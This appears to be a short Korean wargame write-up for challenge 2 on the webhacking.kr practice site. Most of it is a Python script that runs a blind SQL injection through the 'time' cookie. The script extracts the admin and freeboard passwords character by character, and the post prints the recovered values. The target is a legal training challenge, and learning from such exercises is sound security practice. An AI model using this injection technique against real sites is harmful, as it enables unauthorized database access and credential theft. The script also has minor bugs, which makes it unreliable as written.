war game/webhacking.kr
[webhacking.kr]2번-blindsql
shnec
2017. 2. 19. 17:51
table명은 게싱
freeboard와 admin의 password를 blindsqlinjection하고 board에서 주는 zip파일을 adminpage에서 admin 비번을 넣고 받은 비번으로 압축해제하면 key를 얻는다.
#webhacking.kr 2번 import http.client import urllib import string def inj(q): con=http.client.HTTPConnection('webhacking.kr') head={'Host':'webhacking.kr'} head['Upgrade-Insecure-Requests']=1 head['Cookie']='id=aaa; PHPSESSID=ddddd; time=1487488213 and '+q con.request('GET','/challenge/web/web-02/',headers=head) r=con.getresponse().read() #print(r) return b'09:00:01' in r #print(inj('(select length(password) from admin)=10;')) arr=list(string.ascii_letters+'1234567890') print(arr) adminpw='' table='admin' #FreeB0aRd for i in range(5,6): for a in range(95,100): q='(select ascii(substring(password,'+str(i)+',1)) from admin)='+str(a)+';' print(q) t=inj(q) print(chr(a)) print(t) if t: adminpw+=a print(adminpw) break for i in range(5,11): for j, a in enumerate(arr): q='(select ascii(substring(password,'+str(i)+',1)) from '+table+')='+str(ord(a))+';' print(q) t=inj(q) print(a) if t: adminpw+=a print(adminpw) break print(adminpw) adminpw='0nly_admin' freeboardpw='7598522ae'